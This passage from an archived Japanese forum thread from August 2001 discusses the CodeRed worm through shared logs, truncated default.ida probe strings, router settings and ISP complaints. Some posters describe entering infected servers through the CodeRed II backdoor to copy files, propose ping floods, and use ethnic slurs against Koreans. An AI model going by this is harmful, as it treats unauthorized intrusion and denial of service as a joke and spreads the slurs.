思う存分お楽しみください。

ちなみに>>471のほうがレベル高いもの持ってるよ

520 :507:2001/08/08(水) 03:52
実は、この一連の騒動で、
月曜日にOSインストールし直したばっかりなんです。
(コードレッドとは気が付かずに、別のトラブルかと思ったので)
ということは、sadmindの可能性は低いのでしょうか?
(sadmindについてはよく知らないので、今調べています。)
とりあえず、こちらから何かを送信している形跡はないのですが。。。
打つ足し脳

521 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:53
>>519
おお〜神様
なんていい人だ

522 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:54
>>519
ついでに使えるコマンド増やしてください
お願いします

523 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:55
>>519
ワラタ
知らせるにはちょうど良いな(藁

524 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:55
>>521 だまされるなっ! これは罠だ!!

525 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:55
>>520
きちんとフォーマットして再構築やり直したか?
上書きだと消えないだろうし、
復元だとバックアップ時点で感染してたら意味がない。

526 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:56
夏厨版になってしまった。

527 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:56
>>524
えっそうなの?

528 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:56
あー、今のうちにログを回収して >>519 のアドレスを確保しておこうかー。

529 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:57
>>525
CodeRedIIの仕様を知らないと思われ。

530 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:57
いつのまにか厨房のすくつになってしまったが
わらいがとまらん。。。。

531 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:58
>>529
いや、root.exe

532 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:58
もう一度いおう。
これからは、インターネットはこういうものになる。

533 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:58
>>531
はいはい

534 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:58
世界6大会計監査法人のひとつから
インバウンド食らってます(NISで遮断されてますが)

535 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:59
>>528
自分もログに残るよ(w

536 :507:2001/08/08(水) 04:00
>>525
すみません、つきあっていただいて。。。
フォーマットして再構築したのですが、
その後ネットに誤ってつながったときに
感染したのかもしれません。

回線切って逝ってきます。
ありがとうございました。。。

537 :名無しさん@お腹いっぱい。:2001/08/08(水) 04:01
>>536
お大事に。

538 :名無しさん@お腹いっぱい。:2001/08/08(水) 04:01
>>524
今ログ見てきたけど>>519まじでやってるよ

539 :名無しさん@お腹いっぱい。:2001/08/08(水) 04:02
もう一度いおう。
これからは、インターネットはこういうものになっちゃった。

540 :名無しさん@お腹いっぱい。:2001/08/08(水) 04:02
夏厨ちゃんのネタウザイ。

541 :名無しさん@お腹いっぱい。:2001/08/08(水) 04:03
文子はモザイクあったよ
クロウシタノニ・・・

542 :名無しさん@お腹いっぱい。:2001/08/08(水) 04:09
      ∧ ∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
〜′ ̄ ̄( ゚Д゚ ) < 今晩ワこれで終わり
 UU ̄ ̄ U U   \_______________

543 :名無しさん@お腹いっぱい。:2001/08/08(水) 04:09
wwwrootにあげたら
ファイル名きぼんぬ

544 :名無しさん@お腹いっぱい。:2001/08/08(水) 04:10
独り占め禁止

545 :名無しさん@お腹いっぱい。:2001/08/08(水) 04:13
自分たちが何をやってるか分かってるんだろうとは思うが。
バックドアからの侵入の話は他でやってくれないかな。

546 :名無しさん@お腹いっぱい。:2001/08/08(水) 04:16
ダメです隊長ーーーーーー
みんなエロに目が眩んでますーーーーーーー (藁

547 :名無しさん@お腹いっぱい。:2001/08/08(水) 04:18
死肉に群がるハイエナとハゲタカの群れを連想

548 :名無しさん@お腹いっぱい。:2001/08/08(水) 04:18
http://pcweb.mycom.co.jp/news/2001/08/07/06.html
http://pcweb.mycom.co.jp/news/2001/08/07/17.html

549 :名無しさん@お腹いっぱい。:2001/08/08(水) 04:18
Cドライブのプログラムファイルの中の
いくつかのアプリがいきなり消えてしまったんですが
関係あるのでしょうか?
どなたか教えてください。

550 :とりあえず:2001/08/08(水) 04:21
default.idaをあひゃひゃにしといた

551 :名無しさん@お腹いっぱい。:2001/08/08(水) 04:27
どーよ、誰かダウソに成功したんか?

552 :名無しさん@お腹いっぱい。:2001/08/08(水) 04:27
>>546 死肉というか、腐った鯖だがな (藁

553 :名無しさん@お腹いっぱい。:2001/08/08(水) 04:31
ダウソの話はダウソ板に逝けよ

554 :名無しさん@お腹いっぱい。:2001/08/08(水) 05:04
ログを入手したがリブートでファイルが消えるような細工が成功した
形跡は見られなかった。

555 :名無しさん@お腹いっぱい。:2001/08/08(水) 05:17
>>549
自分で間違って消してしまった、ということは考えられないか?
IIS を動作させているのか?
OS は?

556 :名無しさん@お腹いっぱい。:2001/08/08(水) 06:03
質問でしゅ。韓国・中国のネットワークは大丈夫なのでしょうか?
転送速度がちょと落ちるぐらいなのでしょうか?
それともネットが使い物にならない状態なのでしょうか?

557 :名無しさん@お腹いっぱい。:2001/08/08(水) 06:13
感染してるやつのフォルダ消すにはどうしたらいいのかな?

558 :え〜ん:2001/08/08(水) 06:41
おはよう、ドキュソくん減った?

559 :あのう〜:2001/08/08(水) 07:09
>543

すんまそん こぴーできませんが?

f:\XXX\Tokyo sluts2.mpg c:\Inetpub\wwwroot
The filename, directory name, or volume label syntax is incorrect.
0 file(s) copied.

っていわれます。

560 :名無しさん@お腹いっぱい。:2001/08/08(水) 07:41
ドキュソは夜中だけにしてくれ・・・

561 :名無しさん@お腹いっぱい。:2001/08/08(水) 07:50
HKにある機械の情報をJPから操作して取り出したらどの国のケーサツに
つかまるんだ?
いんたーぽーるかあ?

562 :  :2001/08/08(水) 08:00
"GET /default.ida?XXXXXXX〜HTTP/1.0" 404
というのが今までのログだったが、GETもdefault.ida?も
なくて単純にXだけの羅列のログがいくつか残りだしている。
"XXXXXXXXXXX〜HTTP/1.0" 400
何だろう?

563 :名無しさん@お腹いっぱい。:2001/08/08(水) 08:03
↑既出

564 :名無しさん@お腹いっぱい。:2001/08/08(水) 08:08
>>561
日本から米国にアクセス(他人が仕掛けたトローイ利用)して、
日本の警視庁に検挙された例ならあるよ。
ttp://www.npa.go.jp/hightech/arrest_repo/kenkyo_2000.htm

565 :名無しさん@お腹いっぱい。:2001/08/08(水) 08:19
裁判はHKだろね、被害者HKなら、たぶん
刑務所もか(ワラ

566 :564:2001/08/08(水) 08:20
って、お祭り気分で目の前のエロに目がくらんで
やっちゃったドキュソ君たちにはもう遅いか・・・
よいこのみんなは真似しちゃだめだよ(はぁと)

567 :名無しさん@お腹いっぱい。:2001/08/08(水) 08:25
なんかスレ内容変わってるし・・・
夏だねぇ。

568 :名無しさん@Emacs:2001/08/08(水) 08:27
CodeRedに感染したエロサイトがあったよ
でも、運営している人がどんな人か恐くて手が出せないYO!

569 :名無しさん@お腹いっぱい。:2001/08/08(水) 08:28
捕まるわけないじゃん

570 :564:2001/08/08(水) 08:28
ホント夏だねぇ〜。
わらかしてはもらったけど。

571 :564:2001/08/08(水) 08:30
>>568
サイト管理者にメールしてあげるか、もしくは放置がよいと思われ。

さてさて、出勤するか。

572 :名無しさん@お腹いっぱい。:2001/08/08(水) 09:06
>>559
パラメーターはこうだろ
"f:\XXX\Tokyo sluts2.mpg"+"c:\Inetpub\wwwroot"

573 :名無しさん@お腹いっぱい。:2001/08/08(水) 09:10
>>564
覗いて見るのもNGなの?

574 :名無しさん@お腹いっぱい。:2001/08/08(水) 09:24
jpnicのwhois見て連絡とろうにも、メールアドレスすら記入のない
技術連絡担当者って何様のつもり・・・。

575 :名無しさん@お腹いっぱい。:2001/08/08(水) 09:29
夜中は厨房スレ化してるな(w
さて、テレホタイムに集めたログ、プロバイダに送るかな。

576 :573:2001/08/08(水) 09:32
見るだけならOKと思って固定IPで串も刺さずにアクセスしちゃったよ(TT

577 :あのう〜:2001/08/08(水) 09:41
>572
はいそれもやりました。
でもダメでした。

578 :名無しさん@お腹いっぱい。:2001/08/08(水) 09:42
>>574
あーいるねぇ。

仕方ないから会社名や電話番号で検索かけてみてるけど、
なくなってるとことか社名変更してるとことか、確証がとれな
くて鬱。

579 :名無しさん@お腹いっぱい。:2001/08/08(水) 09:52
今日の朝からポート.80だけじゃなく8080にも来るようになってるなぁ
これも Code Red?

ポート: 8080
モード: TCP
IP アドレス: 217.3.91.183
ホスト名: pd9035bb7.dip.t-dialin.net

580 :名無しさん@お腹いっぱい。:2001/08/08(水) 09:57
>>579
アクセスログはどんな感じ?

581 :すざけんなよ:2001/08/08(水) 10:18
Z登場
Zが親でA,Cの子供を自己増殖
GET /default.ida?ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
GET /default.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
GET /default.ida?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

582 :名無しさん@お腹いっぱい。:2001/08/08(水) 10:22
>>574
(1) ヤーさま。
(2) ただのおやじ。

583 :名無しさん@お腹いっぱい。:2001/08/08(水) 10:24
>>581
GET /default.ida?萌え萌え萌え萌え萌え萌え萌え萌え萌え萌え萌え萌え萌え萌え萌え
GET /default.ida?鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱
(ただしUTF-8に変換)

584 :名無しさん@お腹いっぱい。:2001/08/08(水) 10:35
>>580
こんな感じ
01.8.8 9:56:30 AM 拒否 Web 共有 kk-393.alphatec.or.jp
01.8.8 9:56:20 AM 拒否 不明 (8080) 61.129.120.179
01.8.8 9:56:18 AM 拒否 不明 (8080) 61.129.120.179
01.8.8 9:56:15 AM 拒否 不明 (8080) 61.129.120.179
01.8.8 9:56:13 AM 拒否 不明 (8080) 61.129.120.179
01.8.8 9:56:11 AM 拒否 不明 (8080) 61.129.120.179
01.8.8 9:56:08 AM 拒否 不明 (8080) 61.129.120.179
01.8.8 9:55:46 AM 拒否 Web 共有 210.107.98.33
01.8.8 9:55:45 AM 拒否 Web 共有 210.107.98.33
01.8.8 9:54:18 AM 拒否 不明 (8080) 210.14.229.53
01.8.8 9:54:17 AM 拒否 不明 (8080) 210.14.229.53
01.8.8 9:54:16 AM 拒否 不明 (8080) 210.14.229.53
01.8.8 9:54:15 AM 拒否 不明 (8080) 210.14.229.53
01.8.8 9:51:37 AM 拒否 Web 共有 210.109.54.5
01.8.8 9:51:37 AM 拒否 Web 共有 210.109.54.5
01.8.8 9:51:36 AM 拒否 Web 共有 210.109.54.5
01.8.8 9:50:25 AM 拒否 Web 共有 yokohamako2-158.ppp-1.dion.ne.jp
01.8.8 9:50:21 AM 拒否 Web 共有 yokohamako2-158.ppp-1.dion.ne.jp
01.8.8 9:50:18 AM 拒否 Web 共有 yokohamako2-158.ppp-1.dion.ne.jp
01.8.8 9:48:28 AM 拒否 Web 共有 210.73.76.5
01.8.8 9:48:27 AM 拒否 Web 共有 210.73.76.5
01.8.8 9:48:26 AM 拒否 Web 共有 210.73.76.5
01.8.8 9:42:09 AM 拒否 不明 (8080) pd9035bb7.dip.t-dialin.net
01.8.8 9:42:08 AM 拒否 不明 (8080) pd9035bb7.dip.t-dialin.net
01.8.8 9:42:07 AM 拒否 不明 (8080) pd9035bb7.dip.t-dialin.net
01.8.8 9:42:06 AM 拒否 不明 (8080) pd9035bb7.dip.t-dialin.net
01.8.8 9:42:05 AM 拒否 不明 (8080) pd9035bb7.dip.t-dialin.net
01.8.8 9:42:04 AM 拒否 不明 (8080) pd9035bb7.dip.t-dialin.net
01.8.8 9:41:51 AM 拒否 Web 共有 210.101.100.106
01.8.8 9:41:50 AM 拒否 Web 共有 210.101.100.106
01.8.8 9:41:49 AM 拒否 Web 共有 210.101.100.106
01.8.8 9:38:15 AM 拒否 不明 (8080) 211.95.67.243
01.8.8 9:38:09 AM 拒否 不明 (8080) 211.95.67.243
01.8.8 9:38:04 AM 拒否 不明 (8080) 211.95.67.243
01.8.8 9:38:01 AM 拒否 不明 (8080) 211.95.67.243
01.8.8 9:37:59 AM 拒否 不明 (8080) 211.95.67.243

585 :ごめんよ、俺から攻撃されたみんな:2001/08/08(水) 10:38
アナログモデムにて接続中、やたらとモデムのアクセスランプが点滅する

何で?と思ってモデムのプロパティを見ると、大量のパケットを送信中

もしや?と思ってnetstatを見ると、いろんなサイトのport80に接続中

そんなバカな、と思ってタスクマネージャを開くと、IIS動作中。

ガ━━(゚Д゚;)━━ン!

586 :名無しさん@お腹いっぱい。:2001/08/08(水) 10:38
>>584
バックドアだのがあいてるところ、巡回中なんじゃないか?

587 :名無しさん@お腹いっぱい。:2001/08/08(水) 10:44
ADSLで接続中、突然通信できなくなる

プロバイダがCodeRedのパケットストームで落ちていると断定

「ゴルァ! CodeRed喰らって落ちてるぞ。早く直せオラ」と電話

「お客様のマシンからCodeRedのパケット出ておりましたので切り離しました」

ガ━━(゚Д゚;)━━ン!

588 :名無しさん@お腹いっぱい。:2001/08/08(水) 10:47
5 不正アクセス禁止法違反
(1)他人が仕掛けたトロイの木馬系ハッキングプログラムから取得したID、パスワードを使
用して、アメリカ合衆国に設置された有料ゲームサイトの認証サーバーに対して不正アクセスを
行い、ゲームを行った。(平成12年2月検挙。警視庁)
(2)有料掲示板「2ショットチャット」の認証機能が甘いことに乗じ、自作CGIプログラム
を使用してセキュリティホールを突き、パスワードを入力することなく不正アクセスした。ま
た、不特定多数の者が当該掲示板にアクセスできるようなリンクを自分の管理するホームページ
上に作成した。(平成12年6月検挙。北海道、富山)
(3)インターネット上の掲示板で知り合ったハッカーグループが、インターネットで不正に入
手した他人の識別符号を使用して、大学やプロバイダーに対して、その管理者等になりすまして
不正アクセスした。(平成12年11月検挙。愛知等)

ドキュソ八倉厨房が多いねえ( ´∀`)

589 :名無しさん@お腹いっぱい。:2001/08/08(水) 10:48
>>ガ━━(゚Д゚;)━━ン!
これいいねぇ(w

590 :名無しさん@お腹いっぱい。:2001/08/08(水) 10:49
>>581
新しい亜種って事?

591 :名無しさん@お腹いっぱい。:2001/08/08(水) 10:50
(3)専門学生(20歳)は、ホームページの中の爆弾マークをクリックすると自動的に110
番につながる携帯電話(インターネット接続)のホームページを開設し、多数の事情を知らない
閲覧者に110番させ警察の通信指令業務を妨害した。(平成12年8月検挙。偽計業務妨害。
警視庁・高知)

これいいねぇ
ブラクラも業務妨害罪?(w

592 :名無しさん@お腹いっぱい。:2001/08/08(水) 10:55
ポリが罠張っているのに気づいてない厨房も多いね、このスレ(w

593 :名無しさん@お腹いっぱい。:2001/08/08(水) 11:04
IIS鯖からのoutgoingのsynパケットを弾くように
パケットフィルタを設定してください

594 :名無しさん@お腹いっぱい。:2001/08/08(水) 11:05
>>592
ワラタ
どんな罠だよ
ダウソ板は行った方が大漁だぞ(w

595 :名無しさん@お腹いっぱい。:2001/08/08(水) 11:07
8080は手動でしょうね。うちのルータの弾きログには1個もないよ
137と53舐めが3回ずつ、80は今日だけですでに一千行超えてる・・・
Apachは1行だけどルータは3行記録するからねぇ

596 :名無しさん@お腹いっぱい。:2001/08/08(水) 11:15
先週RT50iが落ちまくったんで
ファームウェアをRev.3.05.38にしたけど、
3日目にしてまた落ちた。
なんか対応策無い?
お盆休めないな、このままじゃ。

597 :名無しさん@お腹いっぱい。:2001/08/08(水) 11:16
>>595
BlackICEで見ると6カウントずつだけど。SYNのリトライは6発ずつ(攻撃側OSのデフォ?)で、
ルータが3行以上は記録抑制してるだけか。

598 :夏だし:2001/08/08(水) 11:22

対策方法が1つだけある!ログ取るな!

599 :名無しさん@お腹いっぱい。:2001/08/08(水) 11:23
>>596
うちは http service off にして、念のため
httpd listen 8080
httpd host none
とかしているけど。今のところ大丈夫みたいだが。

600 :名無しさん@Emacs:2001/08/08(水) 11:27
8080はproxyを探しているに一票

601 :596:2001/08/08(水) 11:28
>>599
http service offは無理です。
8080にポート変えたら少しは改善する?
(厨房でスマソ)

602 :名無しさん@お腹いっぱい。:2001/08/08(水) 11:28
8080は手動?かなりの数が来てるんだけど?
ま、俺もログ取るの止めるかなぁ
そうそうMacだから全然関係ないし.....逝ってきます

603 :599:2001/08/08(水) 11:30
>>601
とりあえず、今出回ってるタイプの CodeRed 避けなら、
port 80 以外にするのも手かもしれない。
やってみたらレポよろしく。

604 :名無しさん@お腹いっぱい。:2001/08/08(水) 11:31
こうしんされてた。
日本語翻訳機能つき(藁
http://www.security.nl/misc/codered-stats/

605 :名無しさん@お腹いっぱい。:2001/08/08(水) 11:35
>>598
八倉夏厨は逝け

606 :名無しさん@お腹いっぱい。:2001/08/08(水) 11:37
210.164.202.116
なんだ、、、、しっかりしろよ!Nifty!!

a. [IPネットワークアドレス] 210.164.202.112/28
b. [ネットワーク名] NIFTY-SERVE
f. [組織名] ニフティサーブネットワーク(ニ
フティ株式会社)
g. [Organization] Nifty serve network(Nifty Corp
oration)
m. [運用責任者] YN006JP
n. [技術連絡担当者] KM063JP
y. [通知アドレス]
[割当年月日] 1998/06/11
[返却年月日]
[最終更新] 1998/06/11 11:21:58 (JST)
noto@soc.ocn.ad.jp

607 :名無しさん@お腹いっぱい。:2001/08/08(水) 11:42
>>606 何をいまさら(w

608 :ジーコ:2001/08/08(水) 11:56
つないできた相手がIISかどうかってのはどう判断すんの?
調べ方アップ期盆入

609 :名無しさん@お腹いっぱい。:2001/08/08(水) 12:02
IPさえ判れば判定サイトで調べてもいいし、自分で裏口から入って…ゴニョゴニョ

610 :名無しさん@お腹いっぱい。:2001/08/08(水) 12:02
IISにしか感染しないんだから,叩いてきた奴はIIS

611 :名無しさん@お腹いっぱい。:2001/08/08(水) 12:04
大林組から来てる...
てか、ゼネコン大手の癖にOCNエコノミー使ってんじゃねーよ!

612 :名無しさん@お腹いっぱい。:2001/08/08(水) 12:04
>>608

telnet <相手のアドレス> 80
リターンキー数回。

HTTPアクセスはエラーだが、サーバのバージョンが表示される。

613 :名無しさん@お腹いっぱい。:2001/08/08(水) 12:05
>>610
バックドア起動班が居ることをお忘れなく。

614 :名無しさん@お腹いっぱい。:2001/08/08(水) 12:07
omanko.htmlなどを叩いてIISのエラー画面がでればIIS
でも応答すらできないくらい猛烈にパケットを送出している
アホもいるみたいだよ(w

615 :とりあえず:2001/08/08(水) 12:17
企業には連絡取った方が良いかな。

616 :名無しさん@お腹いっぱい。:2001/08/08(水) 12:18
罠張ってたらバックドアいじりに来た。
どうやって遊ぼうかな(w

617 :名無しさん@お腹いっぱい。:2001/08/08(水) 12:20
>>614
omanko画像が出たけどこれはIIS?

618 :名無しさん@お腹いっぱい。:2001/08/08(水) 12:20
>>615
連絡が取れるなら...ね。
昨日企業名でアドレス取ってるとこにメール20通ほどうったら、
宛先不明で15通帰ってきたよ。


とりあえず今OCNにTELしといた。
担当の兄ちゃんよく解ってなかったぽい。

619 :名無しさん@お腹いっぱい。:2001/08/08(水) 12:28
でもcode red v3以降亜種が出てきませんね
ハカーの皆さんは勝手口弄りに忙しいのかな

620 :名無しさん@お腹いっぱい。:2001/08/08(水) 12:28
カンコックってわざと放置してない?

奴等の足りない頭ではF5アタック(藁)が限界だから、
攻撃としてそれより遥かに有効なCodeRedを放置して。。

621 :名無しさん@お腹いっぱい。:2001/08/08(水) 12:30
>>618
うわっ、最低な担当
真面目にサーバ管理してるのが馬鹿らしくなってきたよ(T_T

622 :名無しさん@お腹いっぱい。:2001/08/08(水) 12:33
>>620
そういえば最近は常連が多いな。>姦国
自分達の首を絞めていることにも気づかないらしい。
ping1万発で鯖落とそうか。
それとも裏口晒してやろうか。

623 :名無しさん@お腹いっぱい。:2001/08/08(水) 12:39
IT先進国と言いつつFTTHなどのインフラだけ一丁前で
使う側は所詮チョンということなんだな。始末が悪い。

624 :名無しさん@お腹いっぱい。:2001/08/08(水) 12:43
>>618
OCNにメールしたらいかにもコピペってな返事来たよ。
相当数の問い合わせ&苦情は逝ってるみたいね。

>CodeRed に感染したと思われる弊社ユーザには、弊社より
>連絡し対応させて頂いております。

>また、下記の弊社ホームページに情報を公開し注意を呼び
>かけております。

>OCNホームページ
http://www.ocn.ne.jp/announce/2001/0803.html

>今後とも、宜しくお願い申し上げます。

625 :名無しさん@お腹いっぱい。:2001/08/08(水) 13:01
>>624
ちなみにどこにメールした?
whoisで出た運用責任者(5人もいやがる)の一番上に出したんだけど‥
まだ返事こないしー

626 :618:2001/08/08(水) 13:03
うちはOCNからメールの返事無いんでゴラァ!電したんだけど...
全ユーザに一律でメールだしとけって言っといたけどまだこない。
てか、OCNの推奨環境ってNTだよ。
DNSもBIND For NT使えって書いてあるし。
うちはFreeBSD使ってるが。

627 :618:2001/08/08(水) 13:04
>>625
OCNの故障担当にメールと電話。
この状況はどう考えても回線異常。

628 :名無しさん@お腹いっぱい:2001/08/08(水) 13:16
>>587
結局こんなやつばっかりだったんだろう。
だけどワラタ

629 :名無しさん@お腹いっぱい。:2001/08/08(水) 13:30
ttp://bbs.tip.ne.jp/win_slink/101457_13.html
おもろいもんめっけ
このなかのレスつけたやつで感染してるの誰だ?
ププp

630 :名無しさん@お腹いっぱい。:2001/08/08(水) 13:38
KRNIC
http://whois.nic.or.kr/english/

631 :名無しさん@お腹いっぱい。:2001/08/08(水) 13:41
APNIC
http://www.apnic.net/

632 :いま、一番質問したい相手。:2001/08/08(水) 13:50
       冫─'  ~  ̄´^-、
     /          丶
    /             ノ、
   /  /ヽ丿彡彡彡彡彡ヽヽ
   |  丿           ミ
   | 彡 ____  ____  ミ/
   ゝ_//| =Θ= |⌒| =Θ= |ヽゞ
   |tゝ  \__/_  \__/ | |
   ヽノ    /\_/\   |ノ  __________
    ゝ   /ヽ───‐ヽ / /
     /|ヽ   ヽ──'   / <ハーイ。ビル・ゲイシです。
    / |  \    ̄  /   \
   / ヽ    ‐-           ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

633 :名無しさん@お腹いっぱい。:2001/08/08(水) 13:56
OS板の既出ですまんが、いま読むとハラたつ。
http://www.microsoft.com/JAPAN/windows2000/news/dot-truth/default.asp

634 :まぁまぁ、これでも読んどけ:2001/08/08(水) 14:09
http://www.sun.co.jp/realitycheck/headsup000216.html

635 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:14

うー、 むかむかするぜ。> まいくろそふと

636 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:16
ビル・ゲイツはこんなことを言ったそうです。
「もしGMがコンピューター業界のような絶え間ない技術開発競争にさら
されていたら,私たちの車は1台25ドルになっていて,燃費は1ガロン
1000マイルになっていたでしょう。」

これに対し,GMは次のようなコメントを出したと言われています。
「もし,GMにマイクロソフトのような技術があれば,我が社の自動車の性能は
次のようになるだろう。」

1.特に理由がなくても,2日に1回はクラッシュする。
2.ユーザーは,道路のラインが新しく引き直されるたびに新しい車を買わなく
てはならない。
3.高速道路を走行中,ときどき動かなくなることもあるが,これは当然のこと
であり,淡々とこれをリスタート(再起動)し,運転を続けることになる。
4.何か運転操作(例えば左折)を行うと,これが原因でエンストし,
再スタートすらできなくなり,結果してエンジンを再インストールしな
ければならなくなることもある。
5.車に乗ることができるのは,Car95とかCarNTを買わない限り,
1台に1人だけである。ただその場合でも,座席は人数分だけ新たに買う
必要がある。
6.マッキントッシュがサンマイクロシステムズと提携すればもっと信頼性があ
って,5倍速くて,2倍運転しやすい自動車になるのだろうが,全道路の
たった5%しか走れないのが問題である。
7.オイル,水温,発電機などの警告灯は「一般保護違反」という警告灯一つだ
けになる。
8.座席は,体の大小,足の長短等によって調整できない。
9.エアバッグが動作するときは「本当に動作して良いですか?」という確認が
ある。
10.車から離れると,理由もなくキーロックされてしまい,車の外に閉め出さ
れることがある。ドアを開けるには,1ドアの取っ手を上にあげる,2キーを
ひねる,3ラジオアンテナをつかむ,という操作を同時に行う。

637 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:21
上手いこと言ってるね。
でも、最後の10はよくわからん。

638 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:24
>>637
ログインするにはCtrl+Alt+Deleteを押してください。

639 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:25
>>633
ワラタ

> ドットコム
> Sun は本当に「ドット イン.com」であるのといえるのか?
> いかなる観点からみても Windows は商用ネットの中心にいます。

商用サーバの多くは Sun や HP のハードウェアだと思うのだが。
俺が携わった仕事では、Windows は単なるクライアントマシン(ブラウザ
を使用するくらい)でしかないことがほとんど。
NT系Windowsをサーバにしたシステムもごく少数であるけど、セキュリティ
ホール対処、ServicePack を当てたことによるプログラムの改造に追われて
だーいぶ苦労されてます。

> 信頼性
> Sun のサーバーはもっと信頼できるのか?
> 多くのユーザーが、Microsoft Windows にその安定性を求めてきりかえています。

「安定性」→「脆弱性」の間違いでは・・・

> 拡張性
> Sun は Windows よりもさらにスケーラブルであるといえるのか?
> Windows 2000 は、その拡張性とパフォーマンスで世界記録を達成しつつあります。

リライト。
「Windows 2000 と IIS の組み合わせは、その脆弱性で世界記録を達成してます。」

> 無料ソフトウェア
> Sun は本当に Solaris をフリーで提供しているのか?
> Sun の提供するソリューションよってかかるコストについて見てみましょう。

商用システムの場合、フリーソフトはまず使わない。
サポートを受けられる有償ソフトを使います。

640 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:26
ナルホド。
ヤルネGM!

641 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:26
>>637
パス付きのスクリーンセーバーのことでない?

642 :まぁまぁ、これでも読んどけ:2001/08/08(水) 14:27
Solarisの素晴らしさを教えてください
http://cocoa.2ch.net/test/read.cgi?bbs=unix&key=992926342

643 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:30
>>639
本当に被害総額で世界記録を達成するらしいYO
CodeRed で

644 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:30
ま、安全よりも機能、便利なものは何でもつけとけ、
というMSの体質が今回の騒動の一端なのは確かだな。

645 :名無しさん@お腹いっぱい。 :2001/08/08(水) 14:33
いろいろなサイト見てもなんか自分が求めてる情報がありません。

いったいどうやってパソコン内に入ってくるのですか?
ポートはどこを通ってくるのですか?
できるだけ詳しく教えてください。

646 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:39
>>645
>>1>>2 のリンク先を読め。

647 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:41
探すのだりぃ〜。

648 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:44
>>645
もうちょっと情報がないと…
とりあえずIPアドレスきぼんぬ。

649 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:46
エンジンを止める時は「スタート」ボタンを押す

てのがぬけてんじゃ

650 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:47
>>648
大学のLANなんでグローバルじゃないっす。

651 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:51
Windows VS Solarisかあ。
sadmindはもう記憶の彼方?

652 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:50
>>637
Ctrl+Alt+Del

653 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:55
メール転送機能で3段転送したらどうなるの
堂々巡り?

メールアドレスA←−−+
↓          |
メールアドレスB   |
↓          |
メールアドレスC   |
↓          |
+−−−−−−−−−−+

654 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:56
>>653

やってみたら

655 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:56
>>654
無限にメールが増えてメールサーバハング?

656 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:57
話の内容がマイクロソフトになってる・・・

657 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:58
>>653
気になる気になる。いったいどうなるんだ?

658 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:59
>>656

そもそもMSが悪いからでしょ

659 :名無しさん@お腹いっぱい。:2001/08/08(水) 14:59
┌─────┐
│ ウィソNT  │       ルーター
│  IIS ┏┷┓ EtherNet ┏━┓Internet
│(´д`)┃80┠──────┨80┠─────(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜
│  ↓ ┗┯┛      ┗━┛
│  ISAPI │
│  ↓  │
│IndexServe│
└─────┘

┌─────┐
│ ウィソNT  │       ルーター
│  IIS ┏┷┓ EtherNet ┏━┓Internet
│(´д`)┃80┠(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜
│  ↓ ┗┯┛      ┗━┛
│  ISAPI │
│  ↓  │
│IndexServe│
└─────┘

┌────────┐
│ ウィソNT     │       ルーター
│  IIS    ┏┷┓ EtherNet ┏━┓Internet
│(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜
│  ↓    ┗┯┛      ┗━┛
│  ISAPI    │
│BufferOverFlow! │
│        │
└────────┘

┌────────┐
│ ウィソNT     │       ルーター
│  IIS    ┏┷┓ EtherNet ┏━┓Internet
│(゚∀゚)アヒャヒャヒャ(CodeRed゚∀゚)アヒャヒャヒャ(CodeRed゚∀゚)アヒャヒャヒャ
│  ↓    ┗┯┛      ┗━┛
│  ISAPI    │
│BufferOverFlow! │
│        │
└────────┘

660 :名無しさん@お腹いっぱい。:2001/08/08(水) 15:00
>>657

実験してみろ!

661 :名無しさん@Emacs:2001/08/08(水) 15:04
>>659 ワラタ

662 :名無しさん@お腹いっぱい。:2001/08/08(水) 15:04
なんとなくわかった。

663 :名無しさん@お腹いっぱい。:2001/08/08(水) 15:07
>>659
傑作(w

664 :名無しさん@お腹いっぱい。:2001/08/08(水) 15:11
>>659
ワラタッ、ずれてなきゃ完璧だったのに。

665 :名無しさん@お腹いっぱい。:2001/08/08(水) 15:12

II のほう (XXXX ね) だと思うんだけど、53 時間くらいリクエストを送って
くるホストがあるんだけど、これって何?ページ開いてみたら日本語だから、
